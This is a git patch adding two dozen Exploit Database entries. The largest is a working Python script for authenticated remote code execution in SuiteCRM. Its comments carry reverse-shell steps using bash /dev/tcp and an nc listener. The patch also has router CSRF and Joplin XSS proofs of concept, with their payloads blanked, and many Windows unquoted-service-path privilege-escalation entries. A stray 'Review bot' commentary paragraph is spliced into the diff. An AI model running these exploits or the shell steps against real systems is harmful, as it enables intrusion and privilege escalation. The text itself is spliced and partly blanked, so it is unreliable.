From e797f5230dbf13c5cceccd6dd93441f01500ad41 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Tue, 10 Nov 2020 05:02:05 +0000 Subject: [PATCH] DB: 2020-11-10 24 changes to exploits/shellcodes HP Display Assistant x64 Edition 3.20 - 'DTSRVC' Unquoted Service Path KMSpico 17.1.0.0 - 'Service KMSELDI' Unquoted Service Path Winstep 18.06.0096 - 'Xtreme Service' Unquoted Service Path OKI sPSV Port Manager 1.0.41 - 'sPSVOpLclSrv' Unquoted Service Path IPTInstaller 4.0.9 - 'PassThru Service' Unquoted Service Path Genexus Protection Server 9.6.4.2 - 'protsrvservice' Unquoted Service Path DigitalPersona 4.5.0.2213 - 'DpHostW' Unquoted Service Path Syncplify.me Server! 5.0.37 - 'SMWebRestServicev5' Unquoted Service Path HP WMI Service 1.4.8.0 - 'HPWMISVC.exe' Unquoted Service Path Motorola Device Manager 2.4.5 - 'ForwardDaemon.exe ' Unquoted Service Path Motorola Device Manager 2.5.4 - 'MotoHelperService.exe' Unquoted Service Path Motorola Device Manager 2.5.4 - 'ForwardDaemon.exe ' Unquoted Service Path Realtek Andrea RT Filters 1.0.64.10 - 'AERTSr64.EXE' Unquoted Service Path MEMU PLAY 3.7.0 - 'MEmusvc' Unquoted Service Path Magic Mouse 2 utilities 2.20 - 'magicmouse2service' Unquoted Service Path iDeskService 3.0.2.1 - 'iDeskService' Unquoted Service Path Canon Inkjet Extended Survey Program 5.1.0.8 - 'IJPLMSVC.EXE' - Unquoted Service Path Deep Instinct Windows Agent 1.2.24.0 - 'DeepNetworkService' Unquoted Service Path RealTimes Desktop Service 18.1.4 - 'rpdsvc.exe' Unquoted Service Path DiskBoss v11.7.28 - Multiple Services Unquoted Service Path Privacy Drive v3.17.0 - 'pdsvc.exe' Unquoted Service Path Genexis Platinum-4410 P4410-V2-1.28 - Broken Access Control and CSRF SuiteCRM 7.11.15 - 'last_name' Remote Code Execution (Authenticated) Joplin 1.2.6 - 'link' Cross Site Scripting --- exploits/hardware/webapps/49000.txt | 90 ++++++++++++++++++++++ exploits/multiple/webapps/49024.txt | 23 ++++++ exploits/php/webapps/49001.py | 113 ++++++++++++++++++++++++++++ exploits/windows/local/49002.txt | 39 ++++++++++ 
exploits/windows/local/49003.txt | 24 ++++++ exploits/windows/local/49004.txt | 24 ++++++ exploits/windows/local/49005.txt | 39 ++++++++++ exploits/windows/local/49006.txt | 27 +++++++ exploits/windows/local/49007.txt | 27 +++++++ exploits/windows/local/49008.txt | 25 ++++++ exploits/windows/local/49009.txt | 38 ++++++++++ exploits/windows/local/49010.txt | 40 ++++++++++ exploits/windows/local/49011.txt | 48 ++++++++++++ exploits/windows/local/49012.txt | 44 +++++++++++ exploits/windows/local/49013.txt | 40 ++++++++++ exploits/windows/local/49014.txt | 34 +++++++++ exploits/windows/local/49016.txt | 24 ++++++ exploits/windows/local/49017.txt | 26 +++++++ exploits/windows/local/49018.txt | 30 ++++++++ exploits/windows/local/49019.txt | 35 +++++++++ exploits/windows/local/49020.txt | 37 +++++++++ exploits/windows/local/49021.txt | 32 ++++++++ exploits/windows/local/49022.txt | 101 +++++++++++++++++++++++++ exploits/windows/local/49023.txt | 28 +++++++ files_exploits.csv | 24 ++++++ 25 files changed, 1012 insertions(+) create mode 100644 exploits/hardware/webapps/49000.txt create mode 100644 exploits/multiple/webapps/49024.txt create mode 100755 exploits/php/webapps/49001.py create mode 100644 exploits/windows/local/49002.txt create mode 100644 exploits/windows/local/49003.txt create mode 100644 exploits/windows/local/49004.txt create mode 100644 exploits/windows/local/49005.txt create mode 100644 exploits/windows/local/49006.txt create mode 100644 exploits/windows/local/49007.txt create mode 100644 exploits/windows/local/49008.txt create mode 100644 exploits/windows/local/49009.txt create mode 100644 exploits/windows/local/49010.txt create mode 100644 exploits/windows/local/49011.txt create mode 100644 exploits/windows/local/49012.txt create mode 100644 exploits/windows/local/49013.txt create mode 100644 exploits/windows/local/49014.txt create mode 100644 exploits/windows/local/49016.txt create mode 100644 exploits/windows/local/49017.txt create mode 100644 
exploits/windows/local/49018.txt create mode 100644 exploits/windows/local/49019.txt create mode 100644 exploits/windows/local/49020.txt create mode 100644 exploits/windows/local/49021.txt create mode 100644 exploits/windows/local/49022.txt create mode 100644 exploits/windows/local/49023.txt
diff --git a/exploits/hardware/webapps/49000.txt b/exploits/hardware/webapps/49000.txt
new file mode 100644
index 000000000..e089dbc4e
--- /dev/null
+++ b/exploits/hardware/webapps/49000.txt
@@ -0,0 +1,90 @@
+# Exploit Title: Genexis Platinum-4410 P4410-V2-1.28 - Broken Access Control and CSRF
+# Date: 28-08-2020
+# Vendor Homepage: https://www.gxgroup.eu/ont-products/
+# Exploit Author: Jinson Varghese Behanan (@JinsonCyberSec)
+# Author Advisory: https://www.getastra.com/blog/911/csrf-broken-access-control-in-genexis-platinum-4410/
+# Version: v2.1 (software version P4410-V2-1.28)
+# CVE : CVE-2020-25015
+
+1. Description
+
+Platinum 4410 is a compact router from Genexis that is commonly used at homes and offices. Hardware version V2.1 – Software version P4410-V2-1.28 was found to be vulnerable to Broken Access Control and CSRF which could be combined to remotely change the WIFI access point’s password.
+
+2. Impact
+
+An attacker can send the victim a link, which if he clicks while he is connected to the WiFi network established from the vulnerable router, the password of the WIFI access point will get changed via CSRF exploit. As the router is also vulnerable to Broken Access Control, the victim does not need to be logged in to the router’s web-based setup page (192.168.1.1), essentially making this a one-click hack.
+
+3. Proof of Concept
+
+Create an HTML file with the following code:
+
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+
+
+
+
+
+Open this file in a browser while you are connected to the WIFI. There is no need for the victim to be logged in to the Router admin panel (192.168.1.1). It can be seen that the WIFI connection is dropped. To reconnect, forget the WIFI connection on your laptop or phone and connect using the newly changed password: NEWPASSWORD
+
+
+4. PoC Video: https://www.youtube.com/watch?v=nSu5ANDH2Rk&feature=emb_title
+
+3. Timeline
+
+Vulnerability reported to the Genexis team – August 28, 2020
+Team confirmed firmware release containing fix – September 14, 2020
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49024.txt b/exploits/multiple/webapps/49024.txt
new file mode 100644
index 000000000..6a3cde830
--- /dev/null
+++ b/exploits/multiple/webapps/49024.txt
@@ -0,0 +1,23 @@
+# Exploit Title: Joplin 1.2.6 - 'link' Cross Site Scripting
+# Date: 2020-09-21
+# Exploit Author: Philip Holbrook (@fhlipZero)
+# Vendor Homepage: https://joplinapp.org/
+# Software Link: https://github.com/laurent22/joplin/releases/tag/v1.2.6
+# Version: 1.2.6
+# Tested on: Windows / Mac
+# CVE : CVE-2020-28249
+# References:
+# https://github.com/fhlip0/JopinXSS/blob/main/readme.md
+
+# 1. Technical Details
+# An XSS issue in Joplin for desktop v1.2.6 allows a link tag in a note to
+bypass the HTML filter
+
+# 2. PoC
+# Paste the following payload into a note:
+
+```
+
+```
\ No newline at end of file
diff --git a/exploits/php/webapps/49001.py b/exploits/php/webapps/49001.py
new file mode 100755
index 000000000..468ff3595
--- /dev/null
+++ b/exploits/php/webapps/49001.py
@@ -0,0 +1,113 @@
+# Exploit Title: SuiteCRM 7.11.15 - 'last_name' Remote Code Execution (Authenticated)
+# Date: 08 NOV 2020
+# Exploit Author: M. Cory Billington (@_th3y)
+# Vendor Homepage: https://suitecrm.com/
+# Software Link: https://github.com/salesagility/SuiteCRM
+# Version: 7.11.15 and below
+# Tested on: Ubuntu 20.04 LTS
+# CVE: CVE-2020-28328
+# Writeup: https://github.com/mcorybillington/SuiteCRM-RCE
+
+from requests import Session
+from random import choice
+from string import ascii_lowercase
+
+url = "http://127.0.0.1/" # URL to remote host web root
+post_url = "{url}index.php".format(url=url)
+user_name = "admin" # User must be an administrator
+password = "admin"
+prefix = 'shell-'
+file_name = '{prefix}{rand}.php'.format(
+ prefix=prefix,
+ rand=''.join(choice(ascii_lowercase) for _ in range(6))
+)
+
+# *Recommend K.I.S.S as some characters are escaped*
+# Example for reverse shell:
+# Put 'bash -c '(bash -i >& /dev/tcp/127.0.0.1/8080 0>&1)&' inside a file named shell.sh
+# Stand up a python web server `python -m http.server 80` hosting shell.sh
+# Set a nc listener to catch the shell 'nc -nlvp 8080'
+command = ''.format(fname=file_name)
+
+# Admin login payload
+login_data = {
+ "module": "Users",
+ "action": "Authenticate",
+ "return_module": "Users",
+ "return_action": "Login",
+ "user_name": user_name,
+ "username_password": password,
+ "Login": "Log+In"
+}
+
+# Payload to set logging to 'info' and create a log file in php format.
+modify_system_settings_data = {
+ "action": (None, "SaveConfig"),
+ "module": (None, "Configurator"),
+ "logger_file_name": (None, file_name), # Set file extension in the file name as it isn't checked here
+ "logger_file_ext": (None, ''), # Bypasses file extension check by just not setting one.
+ "logger_level": (None, "info"), # This is important for your php code to make it into the logs
+ "save": (None, "Save")
+}
+
+# Payload to put php code into the malicious log file
+poison_log = {
+ "module": (None, "Users"),
+ "record": (None, "1"),
+ "action": (None, "Save"),
+ "page": (None, "EditView"),
+ "return_action": (None, "DetailView"),
+ "user_name": (None, user_name),
+ "last_name": (None, command),
+}
+
+# Payload to restore the log file settings to default after the exploit runs
+restore_log = {
+ "action": (None, "SaveConfig"),
+ "module": (None, "Configurator"),
+ "logger_file_name": (None, "suitecrm"), # Default log file name
+ "logger_file_ext": (None, ".log"), # Default log file extension
+ "logger_level": (None, "fatal"), # Default log file setting
+ "save": (None, "Save")
+}
+
+# Start of exploit
+with Session() as s:
+
+ # Authenticating as the administrator
+ s.get(post_url, params={'module': 'Users', 'action': 'Login'})
+ print('[+] Got initial PHPSESSID:', s.cookies.get_dict()['PHPSESSID'])
+ s.post(post_url, data=login_data)
+ if 'ck_login_id_20' not in s.cookies.get_dict().keys():
+ print('[-] Invalid password for: {user}'.format(user=user_name))
+ exit(1)
+ print('[+] Authenticated as: {user}. 
PHPSESSID: {cookie}'.format(
+ user=user_name,
+ cookie=s.cookies.get_dict()['PHPSESSID'])
+ )
+
+ # Modify the system settings to set logging to 'info' and create a log file in php format
+ print('[+] Modifying log level and log file name.')
+ print('[+] File name will be: {fname}'.format(fname=file_name))
+ settings_header = {'Referer': '{url}?module=Configurator&action=EditView'.format(url=url)}
+ s.post(post_url, headers=settings_header, files=modify_system_settings_data)
+
+ # Post to update the administrator's last name with php code that will poison the log file
+ print('[+] Poisoning log file with php code: {cmd}'.format(cmd=command))
+ command_header = {'Referer': '{url}?module=Configurator&action=EditView'.format(url=url)}
+ s.post(url, headers=command_header, files=poison_log)
+
+ # May be a good idea to put a short delay in here to allow your code to make it into the logfile.
+ # Up to you though...
+
+ # Do a get request to trigger php code execution.
+ print('[+] Executing code. Sending GET request to: {url}{fname}'.format(url=url, fname=file_name))
+ execute_command = s.get('{url}/{fname}'.format(url=url, fname=file_name), timeout=1)
+ if not execute_command.ok:
+ print('[-] Exploit failed, sorry... Might have to do some modifications.')
+
+ # Restoring log file to default
+ print('[+] Setting log back to defaults')
+ s.post(post_url, headers=settings_header, files=restore_log)
+
+print('[+] Done. Clean up {fname} if you care...'.format(fname=file_name))
\ No newline at end of file
diff --git a/exploits/windows/local/49002.txt b/exploits/windows/local/49002.txt
new file mode 100644
index 000000000..0b9717b3a
--- /dev/null
+++ b/exploits/windows/local/49002.txt
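Review bot: The header block gives no account of what the script changes on the target, which is the first thing an authorized tester or an incident responder needs from this entry: the `SaveConfig` post built from `modify_system_settings_data` switches the instance's logger to a `.php` file name at `info` level, the `Users`/`Save` post writes `command` into the administrator's `last_name`, and the closing `restore_log` post only resets the logger while the final `[+] Done. Clean up {fname}` line confirms the generated `.php` file stays in the web root. I would add a `# Side effects:` block after the `# Writeup:` line naming those three artifacts (logger configuration, the admin record's `last_name`, the `shell-*.php` file) so a sanctioned run can be verified afterwards and defenders know which configuration records, user fields and web-root files to inspect. The payload assigned to `command` is not visible in this copy of the patch, so the note can only describe that write generically.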
@@ -0,0 +1,39 @@
+# Exploit Title: HP Display Assistant x64 Edition 3.20 - 'DTSRVC' Unquoted Service Path
+# Date: 2020-11-08
+# Exploit Author: Julio Aviña
+# Vendor Homepage: https://www.portrait.com/
+# Software Link: https://www.portrait.com/dtune/hwp/enu/
+# Software Version: 3.20
+# File Version: 1.0.0.1
+# Tested on: Windows 10 Pro x64 es
+# Vulnerability Type: Unquoted Service Path
+
+
+# 1. To find the unquoted service path vulnerability
+
+C:\>wmic service where 'name like "%DTSRVC%"' get name, displayname, pathname, startmode, startname
+
+DisplayName Name PathName StartMode StartName
+Portrait Displays Display Tune Service DTSRVC C:\Program Files (x86)\Common Files\Portrait Displays\Shared\dtsrvc.exe Auto LocalSystem
+
+# 2. To check service info:
+
+C:\>sc qc "DTSRVC"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: DTSRVC
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 1 NORMAL
+ NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Common Files\Portrait Displays\Shared\dtsrvc.exe
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : Portrait Displays Display Tune Service
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
+
+
+# 3. Exploit:
+
+A successful attempt to exploit this vulnerability requires the attacker to insert an executable file into the service path undetected by the OS or some security application.
+When restarting the service or the system, the inserted executable will run with elevated privileges.
\ No newline at end of file
diff --git a/exploits/windows/local/49003.txt b/exploits/windows/local/49003.txt
new file mode 100644
index 000000000..4a9ebbf67
--- /dev/null
+++ b/exploits/windows/local/49003.txt
@@ -0,0 +1,24 @@
+#Exploit Title: KMSpico 17.1.0.0 - 'Service KMSELDI' Unquoted Service Path
+#Exploit Author : SamAlucard
+#Exploit Date: 2020-11-08
+#Vendor : KMSpico
+#Version : Service_KMS 17.1.0.0
+#Vendor Homepage : https://official-kmspico.com/
+#Tested on OS: Windows 7 Pro
+
+#Analyze PoC :
+==============
+
+C:\>sc qc "Service KMSELDI"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: Service KMSELDI
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 1 NORMAL
+ NOMBRE_RUTA_BINARIO: C:\Program Files\KMSpico\Service_KMS.exe
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : Service KMSELDI
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/49004.txt b/exploits/windows/local/49004.txt
new file mode 100644
index 000000000..327f5e57f
--- /dev/null
+++ b/exploits/windows/local/49004.txt
@@ -0,0 +1,24 @@
+#Exploit Title: Winstep 18.06.0096 - 'Xtreme Service' Unquoted Service Path
+#Exploit Author : SamAlucard
+#Exploit Date: 2020-11-08
+#Vendor : Winstep
+#Version : WsxService 18.06.0096
+#Vendor Homepage : https://www.winstep.net/xtreme.asp
+#Tested on OS: Windows 7 Pro
+
+#Analyze PoC :
+==============
+
+C:\>sc qc "Winstep Xtreme Service"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: Winstep Xtreme Service
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 1 NORMAL
+ NOMBRE_RUTA_BINARIO: C:\Program Files\Winstep\WsxService
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : Winstep Xtreme Service
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/49005.txt b/exploits/windows/local/49005.txt
new file mode 100644
index 000000000..01fbde709
--- /dev/null
+++ b/exploits/windows/local/49005.txt
@@ -0,0 +1,39 @@
+# Exploit Title: OKI sPSV Port Manager 1.0.41 - 'sPSVOpLclSrv' Unquoted Service Path
+# Date: 2020-11-08
+# Exploit Author: Julio Aviña
+# Vendor Homepage: https://www.oki.com/
+# Software Link: https://www.oki.com/mx/printing/download/sPSV_010041_2_270910.exe
+# Software Version: 1.0.41
+# File Version: 1.4.2.0
+# Tested on: Windows 10 Pro x64 es
+# Vulnerability Type: Unquoted Service Path
+
+
+# 1. To find the unquoted service path vulnerability
+
+C:\>wmic service where 'name like "%sPSVOpLclSrv%"' get displayname, pathname, startmode, startname
+
+DisplayName PathName StartMode StartName
+OKI sPSV Port Manager C:\Program Files\Okidata\smart PrintSuperVision\xml\ComApi\extend3\portmgrsrv.exe Auto LocalSystem
+
+# 2. To check service info:
+
+C:\>sc qc "sPSVOpLclSrv"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: sPSVOpLclSrv
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 1 NORMAL
+ NOMBRE_RUTA_BINARIO: C:\Program Files\Okidata\smart PrintSuperVision\xml\ComApi\extend3\portmgrsrv.exe
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : OKI sPSV Port Manager
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
+
+
+# 3. Exploit:
+
+A successful attempt to exploit this vulnerability requires the attacker to insert an executable file into the service path undetected by the OS or some security application.
+When restarting the service or the system, the inserted executable will run with elevated privileges.
\ No newline at end of file
diff --git a/exploits/windows/local/49006.txt b/exploits/windows/local/49006.txt
new file mode 100644
index 000000000..bb4b1a848
--- /dev/null
+++ b/exploits/windows/local/49006.txt
@@ -0,0 +1,27 @@
+#Exploit Title: IPTInstaller 4.0.9 - 'PassThru Service' Unquoted Service Path
+#Exploit Author : SamAlucard
+#Exploit Date: 2020-11-08
+#Vendor : HTC
+#Version : IPTInstaller 4.0.9
+#Vendor Homepage : https://www.htc.com/latam/
+#Tested on OS: Windows 7 Pro
+
+#Analyze PoC :
+==============
+
+C:\Users\DSAZ230>sc qc "PassThru Service"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: PassThru Service
+ TIPO : 10
+[image: PassThruserv.jpg]
+ WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 1 NORMAL
+ NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\HTC\Internet
+Pass-Through\PassThruSvr.exe
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : Internet Pass-Through Service
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/49007.txt b/exploits/windows/local/49007.txt
new file mode 100644
index 000000000..182685331
--- /dev/null
+++ b/exploits/windows/local/49007.txt
@@ -0,0 +1,27 @@
+#Exploit Title: Genexus Protection Server 9.6.4.2 - 'protsrvservice' Unquoted Service Path
+Service Path
+#Exploit Author : SamAlucard
+#Exploit Date: 2020-11-08
+#Vendor : Genexus
+#Version : Genexus Protection Server 9.6.4.2
+#Software Link: https://www.genexus.com/en/developers/downloadcenter?data=;;
+#Vendor Homepage : https://www.genexus.com/es/
+#Tested on OS: Windows 10 Pro
+
+#Analyze PoC :
+==============
+
+C:\>sc qc protsrvservice
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: protsrvservice
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 1 NORMAL
+ NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Common
+Files\Artech\GXProt1\ProtSrv.exe
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : ProtSrvService
+ DEPENDENCIAS : RPCSS
+ NOMBRE_INICIO_SERVICIO: LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/49008.txt b/exploits/windows/local/49008.txt
new file mode 100644
index 000000000..42977762a
--- /dev/null
+++ b/exploits/windows/local/49008.txt
@@ -0,0 +1,25 @@
+#Exploit Title: DigitalPersona 4.5.0.2213 - 'DpHostW' Unquoted Service Path
+#Exploit Author : SamAlucard
+#Exploit Date: 2020-11-08
+#Vendor : DigitalPersona U. are U. One Touch
+#Version : DigitalPersona Pro 4.5.0.2213
+#Vendor Homepage : https://www.hidglobal.com/crossmatch
+#Tested on OS: Windows 10 Home
+
+#Analyze PoC :
+==============
+
+C:\>sc qc DpHost
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: DpHost
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 1 NORMAL
+ NOMBRE_RUTA_BINARIO: C:\Program Files
+(x86)\DigitalPersona\Bin\DpHostW.exe
+ GRUPO_ORDEN_CARGA : BiometricGroup
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : Servicio de autenticación biométrica
+ DEPENDENCIAS : RPCSS
+ NOMBRE_INICIO_SERVICIO: LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/49009.txt b/exploits/windows/local/49009.txt
new file mode 100644
index 000000000..180cfd38e
--- /dev/null
+++ b/exploits/windows/local/49009.txt
@@ -0,0 +1,38 @@
+# Exploit Title: Syncplify.me Server! 5.0.37 - 'SMWebRestServicev5' Unquoted Service Path
+# Date: 2020-11-08
+# Exploit Author: Julio Aviña
+# Vendor Homepage: https://www.syncplify.me/
+# Software Link: https://download.syncplify.me/SMServer_Setup.exe
+# Version: 5.0.37
+# Tested on: Windows 10 Pro x64 es
+# Vulnerability Type: Unquoted Service Path
+
+
+# 1. To find the unquoted service path vulnerability
+
+C:\>wmic service where 'name like "%SMWebRestServicev5%"' get displayname, pathname, startmode, startname
+
+DisplayName PathName StartMode StartName
+Syncplify.me Web/REST Server! v5 C:\Program Files\Syncplify\Syncplify.me Server!\SMWebRestSvc.exe Auto LocalSystem
+
+# 2. To check service info:
+
+C:\>sc qc "SMWebRestServicev5"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: SMWebRestServicev5
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 1 NORMAL
+ NOMBRE_RUTA_BINARIO: C:\Program Files\Syncplify\Syncplify.me Server!\SMWebRestSvc.exe
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : Syncplify.me Web/REST Server! v5
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
+
+
+# 3. Exploit:
+
+A successful attempt to exploit this vulnerability requires the attacker to insert an executable file into the service path undetected by the OS or some security application.
+When restarting the service or the system, the inserted executable will run with elevated privileges.
\ No newline at end of file
diff --git a/exploits/windows/local/49010.txt b/exploits/windows/local/49010.txt
new file mode 100644
index 000000000..03f2274d2
--- /dev/null
+++ b/exploits/windows/local/49010.txt
@@ -0,0 +1,40 @@
+#Exploit Title: HP WMI Service 1.4.8.0 - 'HPWMISVC.exe' Unquoted Service Path
+#Discovery by: Jocelyn Arenas
+#Discovery Date: 2020-11-07
+#Vendor Homepage: https://www8.hp.com/mx/es/home.html
+#Tested Version: 1.4.8.0
+#Vulnerability Type: Unquoted Service Path
+#Tested on OS: Windows 10 Home x64 es
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\windows\\" | findstr /i /v """
+
+
+HPWMISVC HPWMISVC c:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe Auto
+
+
+#Service info:
+
+C:\>sc qc HPWMISVC
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME : HPWMISVC
+ TYPE : 110 WIN32_OWN_PROCESS (interactive)
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : c:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : HPWMISVC
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+
+
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security
+applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with
+the elevated privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/49011.txt b/exploits/windows/local/49011.txt
new file mode 100644
index 000000000..8000668fb
--- /dev/null
+++ b/exploits/windows/local/49011.txt
@@ -0,0 +1,48 @@
+# Exploit Title: Motorola Device Manager 2.4.5 - 'ForwardDaemon.exe ' Unquoted Service Path
+# Discovery by: Angel Canseco
+# Discovery Date: 2020-11-08
+# Vendor Homepage: https://www.filehorse.com/es/descargar-motorola-device-manager/
+# Tested Version: 2.4.5
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Pro x64 es
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name, pathname, displayname, startmode | findstr /i
+"Auto" | findstr /i /v "C:\Windows\\" | findstr /i "PST Service " |
+findstr /i /v """
+
+
+Motorola Device Manager C:\Program Files (x86)\Motorola Mobility\Motorola
+Device Manager\MotoHelperService.exe
+Auto
+
+ # Service info:
+
+PST Service C:\Program Files
+(x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe
+
+ Auto
+
+
+C:\>sc qc "PST Service"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: PST Service
+ TIPO : 110 WIN32_OWN_PROCESS (interactive)
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 1 NORMAL
+ NOMBRE_RUTA_BINARIO: C:\Program Files
+(x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : PST Service
+ DEPENDENCIAS : lanmanworkstation
+ NOMBRE_INICIO_SERVICIO: LocalSystem
+
+#Exploit:
+
+A successful attempt would cause the local user to be able to insert their
+code in the system root path
+undetected by the OS or other security applications and elevate his
+privileges after reboot.
\ No newline at end of file
diff --git a/exploits/windows/local/49012.txt b/exploits/windows/local/49012.txt
new file mode 100644
index 000000000..d1f46a872
--- /dev/null
+++ b/exploits/windows/local/49012.txt
@@ -0,0 +1,44 @@
+# Exploit Title: Motorola Device Manager 2.5.4 - 'MotoHelperService.exe' Unquoted Service Path
+# Discovery by: Angel Canseco
+# Discovery Date: 2020-11-07
+# Vendor Homepage: https://motorola-device-manager.programas-gratis.net/descarga-completada
+# Tested Version: 2.5.4
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Pro x64 es
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name, pathname, displayname, startmode | findstr /i
+"Auto" | findstr /i /v "C:\Windows\\" | findstr /i "MotoHelperService " |
+findstr /i /v """
+
+Motorola Device Manager Service
+
+Motorola Device Manager C:\Program Files (x86)\Motorola Mobility\Motorola
+Device Manager\MotoHelperService.exe
+Auto
+
+
+# Service info:
+
+C:\>sc qc "Motorola Device Manager"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: Motorola Device Manager
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 1 NORMAL
+ NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Motorola
+Mobility\Motorola Device Manager\MotoHelperService.exe
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : Motorola Device Manager Service
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
+
+#Exploit:
+
+A successful attempt would cause the local user to be able to insert their
+code in the system root path
+undetected by the OS or other security applications and elevate his
+privileges after reboot.
\ No newline at end of file
diff --git a/exploits/windows/local/49013.txt b/exploits/windows/local/49013.txt
new file mode 100644
index 000000000..e905a08e8
--- /dev/null
+++ b/exploits/windows/local/49013.txt
@@ -0,0 +1,40 @@
+# Exploit Title: Motorola Device Manager 2.5.4 - 'ForwardDaemon.exe 'Unquoted Service Path
+# Discovery by: Angel Canseco
+# Discovery Date: 2020-11-07
+# Vendor Homepage: https://motorola-device-manager.programas-gratis.net/gracias
+# Tested Version: 2.5.4
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Pro x64 es
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name, pathname, displayname, startmode | findstr /i
+"Auto" | findstr /i /v "C:\Windows\\" | findstr /i "ForwardDaemon" |
+findstr /i /v """
+
+
+PST Service C:\Program Files
+(x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe
+Auto
+
+C:\Users\MISTI>sc qc "PST Service"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: PST Service
+ TIPO : 110 WIN32_OWN_PROCESS (interactive)
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 1 NORMAL
+ NOMBRE_RUTA_BINARIO: C:\Program Files
+(x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : PST Service
+ DEPENDENCIAS : lanmanworkstation
+ NOMBRE_INICIO_SERVICIO: LocalSystem
+
+#Exploit:
+
+A successful attempt would cause the local user to be able to insert their
+code in the system root path
+undetected by the OS or other security applications and elevate his
+privileges after reboot.
\ No newline at end of file
diff --git a/exploits/windows/local/49014.txt b/exploits/windows/local/49014.txt
new file mode 100644
index 000000000..239950c5e
--- /dev/null
+++ b/exploits/windows/local/49014.txt
@@ -0,0 +1,34 @@
